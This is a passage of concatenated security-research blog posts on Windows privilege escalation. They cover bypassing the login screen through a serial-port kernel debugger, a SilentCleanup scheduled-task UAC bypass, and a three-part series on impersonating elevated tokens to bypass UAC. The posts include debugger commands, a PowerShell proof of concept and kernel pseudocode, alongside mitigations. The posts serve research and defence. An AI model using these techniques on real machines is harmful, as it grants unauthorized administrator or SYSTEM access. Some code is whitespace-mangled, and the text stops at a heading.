And before anyone complains I'm fully aware that physical access typically means that you've already won, this is why I'm not claiming this is some sort of world ending vulnerability against Windows machines. It's not, but it's a common default configuration which administrators probably don't know to change. It also looks pretty awesome if the stars line up, let's face it, from a customer's perspective it makes you look like some bad-ass hacker. Bonus points for using the command line CDB instead of WinDBG ;-)

And just in case you misunderstand me:

THIS IS NOT A VULNERABILITY!!!!

With that said, let's look at it in more detail.

The Scenario

You find yourself in a room filled with Windows workstations (hopefully legally) and you're tasked with getting code execution on one of them. Your immediate thoughts to achieve this might be one or more of the following:

  • Change boot settings to boot off a CD/USB device and modify HDD
  • Crack open the case, pull the HDD, modify contents and put it back in.
  • Abuse Firewire DMA access to read/write memory.
  • Abuse the network connection coming out the back of the machine, either to try and PXE boot or MitM network/domain traffic on the machine.
Looking at the workstation though booting up you notice that the boot order is configured to boot off the HDD first but a BIOS password prevents you circumventing it (assuming no bug in the BIOS). The case actually has a physical lock on it, probably not something you couldn't pick or crowbar but the customer probably wouldn't be amused if I left the workstation in bits. And finally the workstation didn't have Firewire or any external PCI bus to speak of to perform DMA attacks. I didn't test the network connection, but it might not be easy to PXE boot or MitM'ing the traffic might encounter IPSec.

What these workstations did have though was a classic 9 pin serial port. This got me thinking, I knew that by default Windows configured kernel debugging on COM1, however kernel debugging isn't enabled. Was there a way of enabling kernel debugging on a system without having administrator login rights? Turns out that yes there is, so lets see how you could exploit this scenario.

Coming Prepared


Before you can exploit this feature you'll need a few things to hand:
  • A serial port on your test machine (this is pretty obvious of course). A USB to Serial is sufficient with the right drivers
  • A local installation of Windows. This is more for simplicity, perhaps there's tools to do Windows Kernel Debugging available these days for Linux/macOS which support everything you need but I doubt it.
  • Assuming you're using Windows an installation of Debugging Tools for Windows, specifically WinDBG.
  • A Null Modem cable, you'll need this to connect your test machine's serial port to the workstation serial port.
Now on your test machine ensure everything is installed and setup WinDBG to use your local COM port for kernel debugging. Using kernel debugging just requires you to open WinDBG then from the menu select File -> Kernel Debug or press CTRL + K. You should see a dialog which looks like the following:



Fill in the Port field to match the COM port your USB to Serial adapter was assigned. You shouldn't need to change the Baud Rate as the Windows default is for 115200. You can verify this on another system using an administrator command prompt and running the command bcdedit /dbgsettings



You could also do this via the following command line if you're so inclined: windbg -k com:port=COMX,baud=115200

Enabling Kernel Debugging on Windows 7

Enabling kernel debugging on Windows 7 is really easy (this should also work on Vista, but really who uses that anymore?). Reboot the workstation and after the BIOS POST screen has completed mash (the official technical term) the F8 key. If successful you'll be greeted with the following screen:


Scroll down with the cursor keys, select Debugging Mode and hit Enter. Windows should start to boot. Hopefully if you look at WinDBG you should now see the boot information being displayed (full disclosure, I'm doing this using a VM ;-)).



If this doesn't happen it's possible that the COM port's disabled, the kernel debugging configuration has changed or you've got a terrible USB to Serial adapter.

Enabling Kernel Debugging on Windows 8-10

So moving on to more modern versions of Windows, you can try the F8 trick again, but don't be shocked when it does NOTHING. This was an intentional change Microsoft has made to boot process since Windows 8. With the prevalence of SSDs and various changes to Windows' boot process there's no longer enough time (in their opinion) for mashing the F8 key. Instead, while the option to enable kernel debugging is still present you need to configure it through the fancy UEFI alike menus. 

This presents us with a problem. We're assuming we don't have access to the BIOS (through say a password) so it would seem we couldn't access the UEFI configuration options and the main way you can configure this is going through the Settings App (at least on Windows 10) and choose to restart into Advanced Startup mode or you can pass the /r /o options to shutdown in the command prompt.


None of these options are going to help us. Fortunately there's a "documented' alternative way, if you hold the Shift key when selecting Restart from the start menu it will also reboot into the advanced startup options mode. This doesn't immediately sound like it's going to help you any more than the other options if you've got to login, fortunately on the login screen there's an option to reboot the workstation, and it just so happens that the Shift trick also works here. So go to the power options (on the lower right corner of the login screen on Windows 10), hold left Shift and click Restart. If successful you'll be greeted with the following screen.


 Click the highlighted "Troubleshoot" and you'll get to a new screen.


From here select "Advanced options", going to the *sigh* next screen:


At this screen you'll want to click "Startup Settings" which will bring you the following screen. You might be inclined to think you could click "Command Prompt" to get a system command prompt but that's going to require a password for a local administrator user anyway, which if you've got already you don't need to do this. Also I'm not saying there's no tricks you can't play with recovery mode etc, I'm showing you this just for giggles  :-)


After hitting "Restart" the workstation will reboot and you should be presented with the following:


Finally, you can hit F1 to enable kernel debugging. Phew... bring back F8. If all went according to plan you should see the boot messages again.


Getting Code Execution

You've now got a kernel debugger attached to the machine, the final step is to bypass the login screen. One common trick when using Firewire DMA attacks is to search for a particular pattern in memory which corresponds to LSASS's password check and kill it. Now any login password will work, this is fine but not very sneaky (for example you'd end up with event log entries showing the login). Plus you'd need to know an appropriate user account, it's possible the local Administrator account has been renamed.

Instead we'll do a more targeted attack which is possible because we've got the kernel's view of the system available, not a physical memory view. We'll abuse the fact that the login screen has a button for launching Accessibility tools, this will execute a new process on the login desktop as SYSTEM. We can hijack this process creation to spawn a command prompt and do whatever we like.



First things first we'll want to configure symbols for the machine we're trying to attack. Without symbols we can't enumerate the necessary kernel structures to find the bits of the system to attack. The simplest way to ensure symbols are configured correctly is to type the commands, !symfix+ then !reload into the debugger command window. Now to test issue the command !process 0 0 winlogon.exe which will find the process which is responsible for displaying the login window. If successful it should look something like the following:



The highlighted value is the kernel address of the EPROCESS structure. Copy that value value now to get an "Interactive" debugging session for that process using the command .process /i EPROCESS. Type g, then Enter (or hit F5) and you should see the following:



Now with this interactive session we can enumerate the user modules and load their symbols. Run the command !reload -user to do that. Then we can set a breakpoint on CreateProcessInternalW, which is what will be run whenever a new process is about to be created. Where this function is depends on the Windows version, on Windows 7 it's in the kernel32 DLL, on Windows 8+ it's in kernelbase DLL. So set the breakpoint using bp MODULE!CreateProcessInternalW replacing MODULE with the name appropriate for your system.

With the breakpoint set, click the Ease of Access button on the login screen and hopefully the breakpoint should hit. Now just to be sure issue the commands r and k to dump the current registers and show a back trace. It should look something like the following:


We can see in the stack trace that we've got calls to things like WlAccessibilityStartShortcutTool which seem to be related to accessibility. Now CreateProcessInternalW takes many parameters, but the only one we're really interested in is the third parameter, which is a pointer a NUL terminated command line string. We can modify this string to instead refer to the command prompt and we should get out desired code execution. First just to be sure we'll dump the string using the dU command, for x64 pass dU r8 (as the third parameter is stored in the r8 register), for x86 issue dU poi(@esp+c) (on 32 bit all parameters are passed on the stack). Hopefully you'll see the following:


So WinLogon is trying to create an instance of utilman.exe, that's good. Now this string must be writable (there's a dumb behaviour of CreateProcess that if it's not you'll get a crash) so we can just overwrite it. Issue the command ezu r8 "cmd" or ezu poi(@esp+c) "cmd" depending on your bitness and then type g and enter to continue. Bathe in your awesomeness.


Downsides

So there are a number of downsides to this technique:
  • The workstation MUST have a serial port on it, which isn't a given at least these days, and it must be configured as COM1
  • The workstation must be rebooted, this means that you can't get access to any logged on user credentials or things left in memory. Another issue with this is if the workstation has a boot password you might not be able to reboot it anyway.
  • The configuration of the kernel debugging must be the default.
  • In the prescence of TPM enforced Bitlocker you shouldn't be able to change the debugger configuration without also invalidating the boot measurement meaning Bitlocker won't unlock the drive.
Still in the end the setup costs are so low, it wouldn't take much to carry a USB to Serial adapter and a Null Modem cable in your travel bag if you're going on site somewhere. 

Mitigations

It's all very well and good that you can do this, but is there anyway to prevent it? Well of course as many will point out if you've already got physical access it's Game Over Man (R.I.P. Bill) but there are some configuration changes you can make to remove this attack vector:

  • Change the default debugging settings to Local kernel debugging. This is a mode which means only a local debugger running as administrator can debug the kernel (and debugging must also be on). You can change it at an administrator command prompt with the command bcdedit /dbgsettings LOCAL. You could almost certainly automate this across your estate with a login script or GPO option.
  • Don't buy Workstations with serial ports. Sounds dumb, and you probably have little choice but don't get things on your purchased devices which serve no useful purpose. Presumably some vendors still provide a configuration option for this.
  • If you do have serial ports disable them in the BIOS or, if you can't disable them outright change the default I/O port from 0x3F8. Legacy COM ports are not plug and play, Windows will use an explicit I/O port to talk to COM1, if your COM port isn't configured as COM1 Windows can't use it. This is also important if you've installed aftermarket COM port cards, while they tend not to be configured as COM1 they _could_ be.
  • Finally use Bitlocker with a TPM, this is a good idea regardless as it would also block someone being able to pull the HDD out and modify it offline (or just up and stealing the thing for the information on the disk). Bitlocker + TPM would prevent someone enabling debugging on a system without knowing the Bitlocker recovery key. At least on Windows 8+ entering the System Settings option requires changing the boot configuration temporarily, which will cause the TPM boot measurement to fail. I've not tested this on Windows 7 though, hitting F8 might not change the boot measurement as I believe that menu is in the winload.exe boot process, at that point Bitlocker's key has already been unsealed. If anyone has a Windows 7 machine with Bitlocker and TPM let me know the result of testing that :-)
Another interesting thing is the latest version of Windows 10 available when I'm writing this (1607, Anniversary Edition) now configures kernel debugging to Local only by default. However it's possible this isn't changed during upgrades so you'd still want to take a look.

Conclusions

So this is a fun, but not particularly serious issue if someone's got physical access to your machine and you've covered a number of the common attack vectors (like HDD access, BIOS, Firewire). Good advice is physical access a potential attack vector for external but also internal threats and it pays to do everything you can to lock your estate down. You should also consider deploying Bitlocker even if they device isn't portable, it makes it more difficult to compromise a workstation through logical attacks on the boot process and also makes it harder to someone to extract sensitive data from a stolen machine.

Exploiting Environment Variables in Scheduled Tasks for UAC Bypass

$
0
0
The Windows Task Scheduler is a great place to go and find privilege escalations, it's typically abused to add SUID style capabilities to Windows in a nice easy to misunderstand package. It can execute programs as LocalSystem, it can auto-elevate applications for UAC, it can even host arbitrary COM objects. All in all it's a mess, which is why finding bugs in the scheduler itself or in the tasks isn't especially difficult. For example here's a fewI'vefoundbefore. This short blog is about a quick and dirty UAC bypass I discovered which works silently even with UAC is set to the highest prompt level and can be executed without dropping any files (other that a registry key) to disk.

Anyway I'm technically on a sabbatical from finding bugs in Microsoft products (best not ask why) so I'll keep this brief. However sometimes while I'm not looking you just sort of trip over a bug. I was poking around various scheduled tasks and noticed one which looked interesting, SilentCleanup. The reason this is interesting is it's a marked as auto-elevating (so will silently run code as UAC admin if the caller is a split-token administrator) and it can be manually started by the non-administrator user.

It turns out I'm not alone in noticing this is interesting, Matt Nelson already found a UAC bypass in this scheduled task but as far as can be determined it's already been fixed, so is there still a way of exploiting it? Let's dump some of the task's properties using Powershell to find out.


We can see the Principal property, which determines what account the task runs as and the Actions property which determines what to run. In the Principal property we can see the Group to run as is Authenticated Users which really means it will run as the logged on user starting the task. We also see the RunLevel is set to Highest which means the Task Scheduler will try and elevate the task to administrator without any prompting. Now look at the actions, it's specifying a path, but notice something interesting? It's using an environment variable as part of the path, and in UAC scenarios these can be influenced by a normal user by writing to the registry key HKEY_CURRENT_USER\Enviroment and specifying a REG_SZ value.

So stop beating around the bush, let's try and exploit it. I dropped a simple executable to c:\dummy\system32\cleanmgr.exe, set the windir environment variable to c:\dummy and started the scheduled task I immediately get administrator privileges. So let's automate the process, I'll use everyone's favourite language, BATCH as we can use the reg and schtasks commands to do all the work we need. Also as we don't want to drop a file to disk we can abuse the fact that the executable path isn't quoted by the Task Scheduler, meaning we can inject arbitrary command line arguments and just run a simple CMD shell.

The BATCH file first sets the windir environment variable to "cmd /K" with a following script which deletes the original windir enviroment variable then uses REM to comment the rest of the line out. Executing this on Windows 10 Anniversary Edition and above as a split token admin will get you a shell running as an administrator. I've not tested it on any earlier versions of Windows so YMMV. I didn't send this to MSRC but through a friend confirmed that it should already be fixed in a coming version of RS3, so it really looks like MS are serious about trying to lock UAC back down, at least as far as it can be. If you want to mitigate now you should be able to reconfigure the task to not use environment variables using the following Powershell script run as administrator (doing this using the UAC bypass is left as an exercise for reader).

If you want to find other potential candidates the following Powershell script will find all tasks with
executable actions which will auto elevate. On my system there are 4 separate tasks, but only one (the SilentCleanup task) can be executed as a normal user, so the rest are not exploitable. Good thing I guess.

Reading Your Way Around UAC (Part 1)

$
0
0
I'm currently in the process of trying to do some improvements to the Chrome sandbox. As part of that I'm doing updates to my Sandbox Attack Surface Analysis Toolset as I want to measure whether what I'm doing to Chrome is having a tangible security benefit. Trouble is I keep walking into UAC bypasses while I'm there which is seriously messing up the flow. So in keeping with my previous blog post on a UAC bypass let me present another. As we go I'll show some demos using the latest version of my NtObjectManager Powershell module (so think of this blog as a plug for that as well, make sure you follow the install instructions on that link before running any of the scripts).

I don't recall every seeing this issue documented (but I'm sure someone can tell me if it has been), however MS clearly know, as we'll see in a later part. Bear in mind this demonstrates just how broken UAC is in its default configuration. UAC doesn't really help you much even if you prevent the auto-elevation as this technique works as long as there exists any elevated process in the same logon session. Let this be a PSA, one of many over the years, that split-token administrator in UAC just means MS get to annoy you with prompts unnecessarily but serves very little, if not zero security benefit.

Before I start I have to address/rant about the "fileless" moniker which is bandied around for UAC bypasses. My previous blog post said it was a fileless bypass, but I still had to write to the registry (which is backed by a file) and of course some sort of executable still needs to be running (which is backed at some point by the page file) and so on. Basically all a fileless bypass means is it doesn't rely on the old IFileOperation tricks to hijack a DLL. Doesn't mean that at no point would some file end on disk somewhere, I suppose it's more a DFIR kind of term. Anyway enough, on to technical content.

One Weird Design Decision

Oh to be a fly on the wall when Microsoft were designing UAC (or LUA as it was probably still known back then). Many different attack vectors were no doubt covered to reduce the chance of escalation from a normal user to administrator. For example Shatter Attacks (and general UI driving) was mitigated using UIPI. COM DLL planting was mitigated by making administrator processes only use HKLM for COM registrations (not especially successfully I might add). And abusing a user's resources were mitigated using Mandatory Integrity Labels to prevent write access from Low to High levels. 

Perhaps there was a super secure version of UAC developed at one point, but the trouble is it would have probably been unusable. So no doubt many of the security ideas got relaxed. One of particular interest is that a non-administrator user can query some, admittedly limited, process information about administrator processes in the same desktop. This has surprising implications as we'll see.

So how much access do normal applications get? We can answer that pretty easily by running the following PS script as a normal split-token admin user.

Import-ModuleNtObjectManager

# Start mmc.exe and ensure it elevates (not really necessary for mmc)Start-Process -Verb runas mmc.exeUse-NtObject($ps=Get-NtProcess-Namemmc.exe){$ps|Format-Table-PropertyProcessId,Name,GrantedAccess}

This should result in MMC elevating and the following printed to the PS console:

ProcessIdNameGrantedAccess--------------------------17000mmc.exeTerminate,QueryLimitedInformation,Synchronize

So it shows we've got 3 access rights, Terminate, QueryLimitedInformation and Synchronize. This kind of makes sense, after all it would be a pain if you couldn't kill processes on your desktop, or wait for them to finish, or get their name. It's at this point that the first UAC design decision comes into play, there exists a normal QueryInformation process access right, however there's a problem with using that access right, and that's down to the default Mandatory Label Policy (I'll refer to it just as IL Policy from now on) and how it's enforced on Processes.

The purpose of IL Policy is to specify which of the Generic Access Rights, Read, Write and Execute a low IL user can get on a resource. This is the maximum permitted access, the IL Policy doesn't itself grant any access rights. The user would still need to be granted the appropriate access rights in the DACL. So for example if the policy allows a lower IL process to get Read and Execute, but not Write (which is the default for most resources) then if the user asks for a Write access right the kernel access check will return Access Denied before even looking at the DACL. So let's look at the IL Policy and Generic Access Rights for a process object:

# Get current process' mandatory label$sacl=$(Get-NtProcess-Current).SecurityDescriptor.SaclWrite-Host"Policy is $([NtApiDotNet.MandatoryLabelPolicy]$sacl[0].Mask)"# Get process type's GENERIC_MAPPING$mapping=$(Get-NtTypeProcess).GenericMappingWrite-Host"Read: $([NtApiDotNet.ProcessAccessRights]$mapping.GenericRead)"Write-Host"Write: $([NtApiDotNet.ProcessAccessRights]$mapping.GenericWrite)"Write-Host"Execute: $([NtApiDotNet.ProcessAccessRights]$mapping.GenericExecute)"

Which results in the following output:

PolicyisNoWriteUp,NoReadUpRead:VmRead,QueryInformation,ReadControlWrite:CreateThread,VmOperation,VmWrite,DupHandle, *Snip*Execute:Terminate,QueryLimitedInformation,ReadControl,Synchronize

I've highlighted the important points. The default policy for Processes is to not allow a lower IL user to either Read or Write, so all they can have is Execute access which as we can see is what we have. However note that QueryInformation is a Read access right which would be blocked by the default IL Policy. The design decision was presumably thus, "We can't give read access, as we don't want lower IL users reading memory out of a privileged process. So let's create a new access right, QueryLimitedInformation which we'll assign to Execute and just transfer some information queries to that new right instead". Also worth noting on Vista and above you can't get QueryInformation access without also implicitly having QueryLimitedInformation so clearly MS thought enough to bodge that rather than anything else. (Thought for the reader: Why don't we get ReadControl access?)

Of course you still need to be able to have access in the DACL for those access, how come a privileged process gives these access at all? The default security of a process comes from the Default DACL inside the access token which is used as the primary token for the new process, let's dump the Default DACL using the following script inside a normal user PS console and an elevated PS console:

# Get process token.Use-NtObject($token=Get-NtToken-Primary){$token.DefaultDalc|Format-Table @{Label="User";Expression={$_.Sid.Name}}, @{Label="Mask";Expression=
{[NtApiDotNet.GenericAccessRights]$_.Mask}}}

The output as a normal user:

UserMask--------domain\userGenericAllNTAUTHORITY\SYSTEMGenericAllNTAUTHORITY\LogonSessionId_0_295469990GenericExecute,GenericRead

And again as the admin user:

UserMask--------BUILTIN\AdministratorsGenericAllNTAUTHORITY\SYSTEMGenericAllNTAUTHORITY\LogonSessionId_0_295469990GenericExecute,GenericRead

Once again the important points are highlighted, while the admin DACL doesn't allow the normal user access there is this curious LogonSessionId user which gets Read and Execute access. It would seem likely therefore that this must be what's giving us Execute access (as Read would be filtered by IL Policy). We can prove this just by dumping what groups a normal user has in their token:

Use-NtObject($token=Get-NtToken-Primary){$token.Groups|Where-Object{$_.Sid.Name.Contains("LogonSessionId")}|Format-List}

Name:NTAUTHORITY\LogonSessionId_0_295469990Sid:S-1-5-5-0-295469990Attributes:Mandatory,EnabledByDefault,Enabled,LogonId

Yup we have that group, and it's enabled. So that solves the mystery of why we get Execute access. This was a clear design decision on Microsoft's part to make it so a normal user could gain some level of access to an elevated process. Of course at this point you might be thinking so what? You can read some basic information from a process, how could being able to read be an issue? Well, let's see how dangerous this access is in Part 2.






Reading Your Way Around UAC (Part 2)

$
0
0
We left Part 1 with the knowledge that normal user processes in a split-token admin logon can get access to TerminateQueryLimitedInformation and Synchronize process access rights to elevated processes. This was due to the normal user and admin user having a Default DACL which grants Execute access to the current Logon Session which is set for all tokens on the same desktop. The question we're left with is how can this possibly be used to elevate your privileges? Let's see how we can elevate our privileges prior to Windows 10.

Of the 3 access rights we have, both Terminate and Synchronize are really not that interesting. Sure you could be a dick to yourself I suppose and terminate your processes, but that doesn't seem much of interest. Instead it's QueryLimitedInformation which is likely to provide the most amusement, what information can we get with that access right? A quick hop, skip and jump to MSDN is in order. The following is from a page on Process Security and Access Rights:

PROCESS_QUERY_INFORMATION (0x0400)
Required to retrieve certain information about a process, such as its token, exit code, and priority class (see OpenProcessToken).

PROCESS_QUERY_LIMITED_INFORMATION (0x1000)
Required to retrieve certain information about a process (see GetExitCodeProcess, GetPriorityClass, IsProcessInJob, QueryFullProcessImageName). A handle that has the PROCESS_QUERY_INFORMATION access right is automatically granted PROCESS_QUERY_LIMITED_INFORMATION.
Windows Server 2003 and Windows XP:  This access right is not supported.

This at least confirms one thing from Part 1, that if you have QueryInformation access you automatically get QueryLimitedInformation as well. So it'd seem to make sense that QueryLimitedInformation just gives you a subset of what you could access from the full QueryInformation. And if this documentation is anything to go by all the things you could access are dull. But QueryInformation highlights something which would be very interesting to get hold of, the process token. We can double check I suppose, let's look at the documentation for OpenProcessToken to see what it says about required access.


ProcessHandle [in]
A handle to the process whose access token is opened. The process must have the PROCESS_QUERY_INFORMATION access permission.
Well that seals it, nothing to see here, move along. Wait, never believe anything you read. Perhaps this is really "Fake Documentation" (*topical* if you're reading this in 2020 from a nuclear fallout shelter just ignore it). Why don't we just try it and see (make sure your previously elevated copy of mmc.exe is still running):

Use-NtObject($ps=Get-NtProcess-Namemmc.exe){Get-NtToken-Primary-Process$ps[0]}|Format-List-PropertyUser,TokenType,GrantedAccess,IntegrityLevel

And then where we might expect to see an error message we instead get:

User:domain\userTokenType:PrimaryGrantedAccess:AssignPrimary,Duplicate,Impersonate,Query,
QuerySource,ReadControlIntegrityLevel :High

This shows we've opened the process' primary token, been granted a number of rights and to be sure we print the IntegrityLevel property to prove it's really a privileged token (more or less for reasons which will become clear).

What's going on? Basically the documentation is wrong, you don't need QueryInformation to open the process token only QueryLimitedInformation. You can disassemble NtOpenProcessTokenEx in the kernel if you don't believe me:

NTSTATUSNtOpenProcessTokenEx(HANDLEProcessHandle,ACCESS_MASKDesiredAccess,DWORDHandleAttributes,PHANDLETokenHandle){EPROCESS*ProcessObject;NTSTATUSstatus=ObReferenceObjectByHandle(ProcessHandle,PROCESS_QUERY_LIMITED_INFORMATION,PsProcessType,&ProcessObject,NULL);...}

Going back to Vista it's always been the case that only QueryLimitedInformation was needed, contrary to the documentation. While you still need to be able to access the token through it's DACL it turns out that Token objects also use the Default DACL so it grants Read and Execute access to the Logon Session SID. But doesn't the Token have the same mandatory policy as Processes? Well let's look, we can modify the IL Policy dump script from Part 1 to use a token object:

# Get current primary token's mandatory label$sacl=$(Get-NtToken-Primary).SecurityDescriptor.SaclWrite-Host"Policy is $([NtApiDotNet.MandatoryLabelPolicy]$sacl[0].Mask)"

And the result is: "Policy is NoWriteUp". So while we can't modify the token (we couldn't anyway due to the Default DACL) we can at least read it. But again this might not seem especially interesting, what use is Read access? As shown earlier Read gives you gives you a few interesting rights, AssignPrimary, Duplicate and Impersonate. What's to stop you now creating a new Process, or Impersonating the token? Well I'd refer you to my presentation at Shakacon/Blackhat on this very topic. To cut a long story short creating a new process is virtually impossible due to the the limits imposed by the kernel function SeIsTokenAssignableToProcess (and the lack of the SeAssignPrimaryTokenPrivilege) but on the other hand impersonation takes a different approach, calling SeTokenCanImpersonate as shown in the following diagram.


The diagram is the rough flow chart for deciding whether a process can impersonate another token (assuming you don't have SeImpersonatePrivilege, which we don't). We can meet every criteria, except one. The kernel checks if the current process's IL is greater-or-equal to the token being impersonated. If the process IL is less than the token's IL then the impersonation token is dropped to Identification level stopping us using it to elevate our privileges. While we can't increase a token's IL we can reduce it, so all we need to do is set the token IL to the same as the process' IL before impersonating and in theory we should become a Medium IL administrator.

There is one small issue to deal with before we do that, setting the IL is a write operation, and we don't have write access to the token. However it turns out that as we have Duplicate we can call DuplicateToken which clones the entire token. We'd need get an impersonation token anyway which requires duplication so this isn't a major issue. The important fact is the resulting duplicated token gives us a Read, Write, and Execute access to the token object. As the Token object's Mandatory Label is set to the caller's IL (which is Medium) not the IL inside the token. This results in the kernel being able to grant us full access to the new token object, confusing I know. Note that this isn't giving us Write access to the original token, just a copy of it. Time for PoC||GtfO:

$token=Use-NtObject($ps=Get-NtProcess-Namemmc.exe){Get-NtToken-Primary-Process$ps[0]-Duplicate ` -ImpersonationLevelImpersonation ` -TokenTypeImpersonation ` -IntegrityLevelMedium}Use-NtObject($token.Impersonate()){[System.IO.File]::WriteAllText("C:\windows\test.txt","Hello")}

And you should see it creates a text file, C:\Windows\test.txt with the contents Hello. Or you could use the New-Service cmdlet to create a new service which will run as LocalSystem, you're an administrator after all even if running at Medium IL. You might be tempted to just enable SeDebugPrivilege and migrate to a system process directly, but if you try that something odd happens:

# Will indicate SeDebugPrivilege is disabled$token.GetPrivilege("SeDebugPrivilege").Enabled# Try enabling the privilege.$token.SetPrivilege("SeDebugPrivilege",$true)# Check again, will still be disabled.$token.GetPrivilege("SeDebugPrivilege").Enabled

You'll find that no matter how hard you try SeDebugPrivilege (and things like SeBackupPrivilege, SeRestorePrivilege) just cannot be enabled. This is another security measure that the UAC designers chose which in practice makes little realistic difference. You can't enable a small set of GOD privileges if the IL of the token is less than High. However you can still enable things like SeMountVolumePrivilege (could have some fun with that) or SeCreateSymbolicLinkPrivilege. We'll get back to this behavior later as it turns out to be important. Most importantly this behavior doesn't automatically disable the Administrators group which means we can still impersonate as a privileged user.

This works amazingly well as long as you run the example on Windows Vista, 7, 8 or 8.1. However on Windows 10 you'll get an error such as the following:

Use-NtObject : Exception calling "WriteAllText" with "2" argument(s): "Either a required impersonation level was not provided, or the provided impersonation level is invalid.

This error message means that the SeTokenCanImpersonate check check failed and the impersonation token got reverted to an Identification token. Clearly Microsoft know's something we don't. So that's where I'll leave it for now, come back when I post Part 3 for the conclusion, specifically getting this to work on Windows 10 and bypassing the new security checks.


Reading Your Way Around UAC (Part 3)

$
0
0
This is the final part in my series on UAC (Part 1 and Part 2 links). In Part 2 we found that if there's any elevated processes running in a split-token admin session on Windows earlier than 10 we could read the primary token from that process as a normal user and impersonate it giving us 99% of admin privileges without a prompt. Of course there's the proviso that there's an elevated process running on the same desktop, but I'd say that's pretty likely for almost any user. At least in most cases you can use silent elevation (through auto elevation, or a scheduled task for instance) to get a process running elevated, you don't care what the process is doing just that it exists.

Also it's been pointed out that what I described in Part 2 sounds exactly like the UAC Bypass used in the Stinger Module "released" in the Vault 7 dumps. It could very well be, I'd be surprised if someone didn't already know about this trick. I've not seen the actual module, and I'm not that interested to find out, but if anyone else is then go for it.

Broken Windows

Anyway on to Windows 10. It seems that the impersonation checks fails and we're dumped down to an Identification token which is pretty much useless. It seems likely that Microsoft have done something to mitigate this attack, presumably they know about this exploitation route. This needs to be reiterated, just because Microsoft fixes a UAC bypass doesn't mean that they're now treating it as a security boundary.

The likely candidate for additional checks is in the SeTokenCanImpersonate function in the kernel, and if we look we find it's been changed up a bit. Compare the following diagram to the similar one in Part 2 and you'll notice a couple of differences:

I've highlighted the important additional step, the kernel now does an elevation check on the impersonation token to determine if the caller is allowed to impersonate it. A simplified version is as follows:

TOKEN*process_token=...;TOKEN*imp_token=...;
#define LIMITED_LOGON_SESSION 0x4if(SeTokenIsElevated(imp_token)){if(!SeTokenIsElevated(process_token)&&(process_token->LogonSession->Flags& LIMITED_LOGON_SESSION)){
returnSTATUS_PRIVILEGE_NOT_HELD;}}

The additional check first determines if the impersonation token is elevated (we'll go into what this means in a bit). If it's not elevated then the function carries on with its other checks as prior to Windows 10. However if it is elevated (which is the case from our PoC in Part 2) it then does an elevation check on the process token. If the process token is not elevated the function will check if a specific flag is set for the Token's Logon Session. If the flag is set then an error is returned. What this means is that there's now only two scenarios where we can impersonate an elevated token, if the process doing the impersonation is already elevated or the process token's logon session has this flag set. Our PoC from Part 2 will clearly fail the first scenario and presumably fails the second. We can check this using a kernel debugger by running an elevated and a non-elevated copy of cmd.exe and checking the flags.

PROCESS ffffb50dd0d0a7c0
    Image: cmd.exe
    Token                             ffff980d0ab5c060
    * SNIP *

kd> dx -r1 ((nt!_TOKEN*)0xffff980d0ab5c060)->LogonSession->Flags
0xc [Type: unsigned long]

This process token is non-elevated, the flags are set to 0xC which contains the value 4 which is the LIMITED_LOGON_SESSION flag.

PROCESS ffffb50dd0cc1080
    Image: cmd.exe
    Token                             ffff980d0a2478e0
    * SNIP *

kd> dx -r1 ((nt!_TOKEN*)0xffff980d0a2478e0)->LogonSession->Flags
0xa [Type: unsigned long]

And now the elevated process token, flags are 0xA which doesn't contain the LIMITED_LOGON_SESSION flag. So we are getting caught by this second check. Why is this check even there at all? As far as I can tell it's for compatibility, possibly with Chrome *ahem*. The additional check was added prior to final release of Windows 10 10586 (in the insider previews this additional logon session flag check didn't exist, and in 10240 the whole elevation check was present but wasn't on by default). So assuming for the moment we can't get a process token without that flag set, what about the SeTokenIsElevated function, is that exploitable in anyway? The code of SeTokenIsElevated looks something like the following:

BOOLEANSeTokenIsElevated(_TOKEN*token){DWORD*elevated;SeQueryInformationToken(token,TokenElevation,&elevated);return*elevated;}

The function queries a token information property, TokenElevation, which returns a non-zero value if the token is elevated. The SeQueryInformationToken API is the kernel equivalent to NtQueryInformationToken from user mode (mostly anyway), so we should also be able to query the elevation state using PS. Let's change a script we had in Part 2 to print the elevation state instead of integrity level as we proved last time that IL doesn't mean a token is really privileged.

functionWrite-ProcessTokenInfo{Param([NtApiDotNet.NtProcess]$Process)Use-NtObject($token=Get-NtToken-Primary-Process$Process){$token|Format-List-PropertyUser,TokenType,Elevated}}Use-NtObject($ps=Get-NtProcess-Namemmc.exe){Write-ProcessTokenInfo$ps[0]}Write-ProcessTokenInfo$(Get-NtProcess-Current)

This outputs:

User      : domain\user
TokenType : Primary
Elevated  : True

User      : domain\user
TokenType : Primary
Elevated  : False

So what does the kernel use to make the determination, clearly it's not the IL as we've already changed that and it still failed. If you dig into the implementation of SeQueryInformationToken the kernel checks two things, firstly whether the token has any GOD privileges (it just so happens the list matches the ones we couldn't enable in Part 2) and whether the Token's groups have any "elevated" SIDs.

The list of GOD privileges that I know of are as follows:
  • SeCreateTokenPrivilege
  • SeTcbPrivilege
  • SeTakeOwnershipPrivilege
  • SeLoadDriverPrivilege
  • SeBackupPrivilege
  • SeRestorePrivilege
  • SeDebugPrivilege
  • SeImpersonatePrivilege
  • SeRelabelPrivilege
  • SeDelegateSessionUserImpersonatePrivilege
As an aside, isn't it odd that SeAssignPrimaryTokenPrivilege isn't in that list? Not that it matters, Administrators don't get that privilege by default, so perhaps that's why.

The "elevated" SIDs don't seem to have an explicit (full) blacklist, instead the kernel calls the function RtlIsElevatedRid with each group and uses that to determine if the SID is an elevated SID. The only check is on the last relative identifier in the SID not the whole SID and looks something like this:

BOOLEANRtlIsElevatedRid(SID_AND_ATTRIBUTES*sid_and_attr){if(sid_and_attr->Attributes&(SE_GROUP_USE_FOR_DENY_ONLY|SE_GROUP_INTEGRITY)){returnFALSE;}PSIDsid=sid_and_attr->Sid;BYTEauth_count=*RtlSubAuthorityCountSid(sid);DWORDlast_rid=*RtlSubAuthoritySid(sid,auth_count-1);DWORDcheck_rids[]={0x200,0x204,0x209,0x1F2,0x205,0x206,0x207,0x208,0x220,0x223,0x224,0x225,0x226,0x227,0x229,0x22A,0x22C,0x239,0x72};for(inti=0;i<countof(check_rids);++i){if(check_rids[i]==last_rid){returnTRUE;}}returnFALSE;}

There's currently 19 banned RIDs. To pick an example, 0x220 is 544 in decimal. The string SID for the BUILTIN\Administrators group is S-1-5-32-544 so that's clearly one banned SID. Anyway as we've got Duplicate access we can make a non-elevated Token using CreateRestrictedToken to set some groups to Deny Only and remove GOD privileges. That way we should be able to impersonate a token with some funky privileges such as SeMountVolumePrivilege which are still allowed, but that's not very exciting. The thought occurs, can we somehow create a process we control which doesn't have the logon session flag and therefore bypass the impersonation check? 

Getting Full Admin Privileges

